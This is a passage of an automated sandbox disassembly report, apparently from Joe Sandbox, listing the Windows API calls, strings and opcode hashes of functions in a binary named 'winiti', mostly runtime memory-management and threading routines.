                  • Opcode Fuzzy Hash: ca88b2e47b65645c36c042b4dc4072e1c75f948b70b361a8b6e96ed663280510
                  • Instruction Fuzzy Hash: 52514F71709AD0C6EB758F15E4553DAB7A0F788B90F544139CAAE53B98CF7CC5468B00

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                  • String ID:
                  • API String ID: 580471860-0
                  • Opcode ID: 19b53f92ddd9a9a7ef10cbccfe69bfe921807fcdb46f8766bab15c0bbd7aa85f
                  • Instruction ID: f9540d22c785dbdc9a25028f9203d8efec715113c337322d56a6f854b2d091be
                  • Opcode Fuzzy Hash: 19b53f92ddd9a9a7ef10cbccfe69bfe921807fcdb46f8766bab15c0bbd7aa85f
                  • Instruction Fuzzy Hash: 4751DFB2A18749C7EB448F19E9493D877B1FB49B84F94003AD94E87369EB38C647CB00

                  Control-flow Graph

                  APIs
                  • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,000000013F5F576B), ref: 000000013F5FB02B
                    • Part of subcall function 000000013F6026B0: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,000000013F5FB04A), ref: 000000013F6026BF
                    • Part of subcall function 000000013F6026B0: GetNumaHighestNodeNumber.KERNEL32 ref: 000000013F6026FD
                    • Part of subcall function 000000013F6026B0: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,000000013F5FB04A), ref: 000000013F602729
                    • Part of subcall function 000000013F6026B0: GetProcessGroupAffinity.KERNEL32 ref: 000000013F60273A
                    • Part of subcall function 000000013F6026B0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,000000013F5FB04A), ref: 000000013F602749
                    • Part of subcall function 000000013F5FD7B0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F5FD8AD
                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,000000013F5F576B), ref: 000000013F5FB09A
                  • GetProcessAffinityMask.KERNEL32 ref: 000000013F5FB0AD
                  • QueryInformationJobObject.KERNEL32 ref: 000000013F5FB0FE
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
                  • String ID: PROCESSOR_COUNT
                  • API String ID: 296690692-4048346908
                  • Opcode ID: f854a702a83dc01c41646339c6b0099762c4a12ee8e6a0d15d954c5e394c61ba
                  • Instruction ID: 97937c418a6d1e838c490c97c64156e8508b87ca622e6b1581f65ea1081cccfa
                  • Opcode Fuzzy Hash: f854a702a83dc01c41646339c6b0099762c4a12ee8e6a0d15d954c5e394c61ba
                  • Instruction Fuzzy Hash: 7331BE72E04B42D6EB149B54D8853EEB7A1FB84798F50007DD69A47BA9DB28CB0FC700

                  Control-flow Graph

                  APIs
                  Strings
                  • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 000000013F5F6726
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastRaise$Sleep
                  • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                  • API String ID: 3706814929-926682358
                  • Opcode ID: 748c09927475cf9e349a911d070e2e85ba1b369a78d20386409e9d4058d69fe5
                  • Instruction ID: 5ba1d3ff431d12d2f5f7c456d578d84fd6b68bfad20517711a6d75d934684790
                  • Opcode Fuzzy Hash: 748c09927475cf9e349a911d070e2e85ba1b369a78d20386409e9d4058d69fe5
                  • Instruction Fuzzy Hash: F4411B32A12B48C6EB949F29F4543E933E0E704B84F04817EDA4D477A5DF39C65AC740

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Thread$CloseCreateHandlePriorityResume
                  • String ID:
                  • API String ID: 3633986771-0
                  • Opcode ID: 43130a00a2952a497caba751cbab80e0c5945ae47426b9584871a3a1cc0fd745
                  • Instruction ID: c53476090daabfae27d130beb6d721c57b5ae109c99f7870010b57cb7166dc4f
                  • Opcode Fuzzy Hash: 43130a00a2952a497caba751cbab80e0c5945ae47426b9584871a3a1cc0fd745
                  • Instruction Fuzzy Hash: 78E06DB9A0070182EB149F26A81A3A56750AB98B85F08443CCD5A067A1EE3C82878600

                  Control-flow Graph

                  • Control-flow graph for 13f602080 (rendered graph data, not reproduced here; basic blocks marked executed / not executed). API call sites in the graph: GetCurrentProcess, GlobalMemoryStatusEx; internal calls to 13f658be5 and 13f658fb0.
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CurrentGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3261791682-2766056989
                  • Opcode ID: 9126c160c7f3f8a979c28d89de266492a2cb26c761d1c6b8a32731156d037bec
                  • Instruction ID: 0aaeed6543946ea420c5b98141c189bb6de4886310ad8f718cc2790efbebf161
                  • Opcode Fuzzy Hash: 9126c160c7f3f8a979c28d89de266492a2cb26c761d1c6b8a32731156d037bec
                  • Instruction Fuzzy Hash: F8417DB1B09B4681F956CB36925639992627F59BC0F28C339AF0F77744FB38C5938600

                  Control-flow Graph

                  • Control-flow graph for 13f621660 (rendered graph data, not reproduced here; basic blocks marked executed / not executed). API call sites in the graph: EnterCriticalSection, LeaveCriticalSection (two enter/leave pairs); internal calls to 13f61e7a0 and 13f602930.
                  APIs
                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,000000013F60D516,?,-8000000000000000,00000001,000000013F61C6D6), ref: 000000013F6216EA
                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,000000013F60D516,?,-8000000000000000,00000001,000000013F61C6D6), ref: 000000013F621759
                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,000000013F60D516,?,-8000000000000000,00000001,000000013F61C6D6), ref: 000000013F6217A2
                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,000000013F60D516,?,-8000000000000000,00000001,000000013F61C6D6), ref: 000000013F6217B8
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 0430e5036a9640feed12229f19debff97727073d71a72808b7631fa93863536e
                  • Instruction ID: 90755c36d04ddddf8d24133ceef858c364a41517e52814bfdd1321a1213404bf
                  • Opcode Fuzzy Hash: 0430e5036a9640feed12229f19debff97727073d71a72808b7631fa93863536e
                  • Instruction Fuzzy Hash: 46517DB6A08A41D2EB25CF11E8853E877B0F745794F58023ADA9D13AAADB38C757C300

                  Control-flow Graph

                  • Control-flow graph for 13f6304d0 (rendered graph data, not reproduced here; basic blocks marked executed / not executed). API call sites in the graph: EnterCriticalSection, LeaveCriticalSection (two enter/leave pairs); internal call to 13f602930.
                  APIs
                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,000000013F61DA29), ref: 000000013F630510
                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,000000013F61DA29), ref: 000000013F630586
                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,000000013F61DA29), ref: 000000013F6305DE
                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,000000013F61DA29), ref: 000000013F630604
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 49907da951615bb056f4715dd605aad2ff44e51d4236cc1df112cb9915273893
                  • Instruction ID: 0f350382378466a648f7f53d518fc2d54cce49ea93ec0083c0e8839865ab0b89
                  • Opcode Fuzzy Hash: 49907da951615bb056f4715dd605aad2ff44e51d4236cc1df112cb9915273893
                  • Instruction Fuzzy Hash: 6D4192B1E08A14E2FA25DF10E9863E927B4F755798F54403ED9CA462B6DB78C64BC310

                  Control-flow Graph

                  Control-flow graph (rendered node and edge list omitted): entry block 13f60cf30, calling SwitchToThread.
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: b53c1b8baf3fa961f42f9a93c026e3a91cc4469665a52e1080013d420c1a925c
                  • Instruction ID: b644f4fb6a2e8f532c01825d11dd82533922382075aa776276fa9da7d503c99f
                  • Opcode Fuzzy Hash: b53c1b8baf3fa961f42f9a93c026e3a91cc4469665a52e1080013d420c1a925c
                  • Instruction Fuzzy Hash: 0571C2B1F0860387FB689F55AC467EA27A1BB40784F14027DAD5A972DADF39CA438704

                  Control-flow Graph

                  APIs
                  • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,000000013F605348,?,?,0000000A,000000013F6043A0,?,?,00000000,000000013F5FEA91), ref: 000000013F602957
                  • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,000000013F605348,?,?,0000000A,000000013F6043A0,?,?,00000000,000000013F5FEA91), ref: 000000013F602977
                  • VirtualAllocExNuma.KERNEL32 ref: 000000013F602998
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: AllocVirtual$CurrentNumaProcess
                  • String ID:
                  • API String ID: 647533253-0
                  • Opcode ID: 686b3994b09b840201f1684b8296069bddec3b68bb7cd25d79b3609eb5cb6e8f
                  • Instruction ID: 9cbbf5815683449ce7b181dc77c14c9ab82dbb6328c10449afd3571c34a514e3
                  • Opcode Fuzzy Hash: 686b3994b09b840201f1684b8296069bddec3b68bb7cd25d79b3609eb5cb6e8f
                  • Instruction Fuzzy Hash: 83F0C271B04690C2EB208F1AF405749BB60BB49FD4F584138EF9C17B68CB3DC6828B04

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: EventRegister
                  • String ID: gcConservative
                  • API String ID: 3840811365-1953527212
                  • Opcode ID: 0bd704104a13a76449dc93aebda2a80e695e757360b9318b75be9f098cee9c4f
                  • Instruction ID: f2627492e1bf40e33282682e4a479efd2767b53344183f915ec2a6b47560cabb
                  • Opcode Fuzzy Hash: 0bd704104a13a76449dc93aebda2a80e695e757360b9318b75be9f098cee9c4f
                  • Instruction Fuzzy Hash: 87312231A01B4AC2FB089F59E9883D937A0F749784F4080BEDA4E0766ADB39C75BC751

                  Control-flow Graph

                  Control-flow graph (rendered node and edge list omitted): entry block 13f658ed4, calling malloc.
                  APIs
                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000000013F658FD9,?,?,?,?,000000013F5FDBC1,?,?,?,000000013F5FE13C,00000000,00000020,?), ref: 000000013F658EEE
                  • Concurrency::cancel_current_task.LIBCPMT ref: 000000013F658F04
                    • Part of subcall function 000000013F659A2C: std::bad_alloc::bad_alloc.LIBCMT ref: 000000013F659A35
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                  • String ID:
                  • API String ID: 205171174-0
                  • Opcode ID: b0e683634f6cf977cd568e859ab9fb6e1e75df7de34bcf169af656f9c50744c0
                  • Instruction ID: b41c23d85cf2b60ab07a75abac0f6377ae806af8e89f4555b376d9b60acf166f
                  • Opcode Fuzzy Hash: b0e683634f6cf977cd568e859ab9fb6e1e75df7de34bcf169af656f9c50744c0
                  • Instruction Fuzzy Hash: 0EE017F0E1221EC1FD2866B65A5F3E500600B58370E2C3B3C5D7E69AD2AA2486978220

                  Control-flow Graph

                  Control-flow graph (rendered node and edge list omitted): entry block 13f5fb2e0, calling CreateThread and CloseHandle.
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CloseCreateHandleThread
                  • String ID:
                  • API String ID: 3032276028-0
                  • Opcode ID: 10e2c95deb48a9fa91c132fa6e8d2868e379d5a6b0bea3614ebc36bd565de11c
                  • Instruction ID: c40bad9cabd79494d5fba423d49e7e7f115b829dd5e6f12864fc9b85a9abbaa9
                  • Opcode Fuzzy Hash: 10e2c95deb48a9fa91c132fa6e8d2868e379d5a6b0bea3614ebc36bd565de11c
                  • Instruction Fuzzy Hash: 43D012B5E0174082DF14DF6568053553AD1BB98B84F85413CD94D83724FA3C83168900
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 1a22502bf992a24a703f73c6a817279700c5c49892520407a1fa6d59b5a26f00
                  • Instruction ID: 38930c0044c4228f9f5fb29e733e7f3684e74c9d0a8a2125d37e32b6f83d32d3
                  • Opcode Fuzzy Hash: 1a22502bf992a24a703f73c6a817279700c5c49892520407a1fa6d59b5a26f00
                  • Instruction Fuzzy Hash: D841ACB5A00A4086EB14CF29E8953E537A0EB45BF4F14437DDAB8876E9CF26C647C340
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 81eb4f473b5f6baa680c7093f92d2b26f8a37406559a141903ec7adff4e5ed1f
                  • Instruction ID: a43def96e9fb57b47a8e80f52bcd9c17bac3dcbab2ea93528cef86e89ddcf819
                  • Opcode Fuzzy Hash: 81eb4f473b5f6baa680c7093f92d2b26f8a37406559a141903ec7adff4e5ed1f
                  • Instruction Fuzzy Hash: 6031AF32B01B51C2EA158B16E50039A73E4EB49FE4F048679DF5C57B98EF38CA678380
                  APIs
                    • Part of subcall function 000000013F6029C0: VirtualFree.KERNELBASE ref: 000000013F6029CA
                  • EnterCriticalSection.KERNEL32(?,?,?,000000013F6166E9,?,?,?,000000013F61C70D), ref: 000000013F630662
                  • LeaveCriticalSection.KERNEL32(?,?,?,000000013F6166E9,?,?,?,000000013F61C70D), ref: 000000013F63068C
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterFreeLeaveVirtual
                  • String ID:
                  • API String ID: 1320683145-0
                  • Opcode ID: 104b6b8d726536473a8dfb620195b120dc1c760eb9325624558afd6144496d8f
                  • Instruction ID: 4f01b0623b0ad8715dbbbd66f6b1b57a01014ed4bc4ed50855e18ae619841976
                  • Opcode Fuzzy Hash: 104b6b8d726536473a8dfb620195b120dc1c760eb9325624558afd6144496d8f
                  • Instruction Fuzzy Hash: 91F0AF72D04A10D2EA148B11F9C93E927F0F7447D0F554179EADD029B9CB38CA8BC700
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 39155d9e0f21e472d4726bd40e7b7375b22274d9dbcec4a77f59ee3cc5932518
                  • Instruction ID: 35ca85bca57381af152161f5d28af1f23d0407ca12d671c76c5d2c76622eb9d4
                  • Opcode Fuzzy Hash: 39155d9e0f21e472d4726bd40e7b7375b22274d9dbcec4a77f59ee3cc5932518
                  • Instruction Fuzzy Hash: D8E01274F1250082FB1C9B27A84B79527916B9DB40FD4843CC40D47351DE29875B9F50
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: BreakDebug
                  • String ID:
                  • API String ID: 456121617-0
                  • Opcode ID: 7460946a867b334da87abb833cff141128d26cc53670839ff519a9e4497aa03f
                  • Instruction ID: ef1ef7b6f4dbeb5aa02b9fab033331307017333c45e0172871aea3139a467633
                  • Opcode Fuzzy Hash: 7460946a867b334da87abb833cff141128d26cc53670839ff519a9e4497aa03f
                  • Instruction Fuzzy Hash: B241B3B2F08A4583FA54CA11D4427E963A5E394BE0F24423ADE6A577C9DF38CA43C740
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastQueryRaiseVirtual
                  • String ID:
                  • API String ID: 3307674043-0
                  • Opcode ID: 1eb33025fcb74d676cc7358ae85899384f83db43159bf41c0ac61a9e8579e1b9
                  • Instruction ID: 5d076765fbf7b1db1f7f7a1a2ca37f17446293fd08e9949d12868d7a4b41ff76
                  • Opcode Fuzzy Hash: 1eb33025fcb74d676cc7358ae85899384f83db43159bf41c0ac61a9e8579e1b9
                  • Instruction Fuzzy Hash: DD115AB2A0478482DB24AB65B4063CAB360F3457B0F144339A6BE47BD6DF38C6078700
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: FreeVirtual
                  • String ID:
                  • API String ID: 1263568516-0
                  • Opcode ID: 5bf7aecc9f77985d4fc3611f7f1d3a7e0808b60eb16f243669942d2759ca37ea
                  • Instruction ID: 0e99d502d7ab29a07f77347c863c0041619cf0d33133fcbea642a3c70f6d471f
                  • Opcode Fuzzy Hash: 5bf7aecc9f77985d4fc3611f7f1d3a7e0808b60eb16f243669942d2759ca37ea
                  • Instruction Fuzzy Hash: C4B01210F12000C2E30427237C87B0C17142B09B12FC40018C608A2350C91C82E62B10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                  • String ID: SeLockMemoryPrivilege
                  • API String ID: 1752251271-475654710
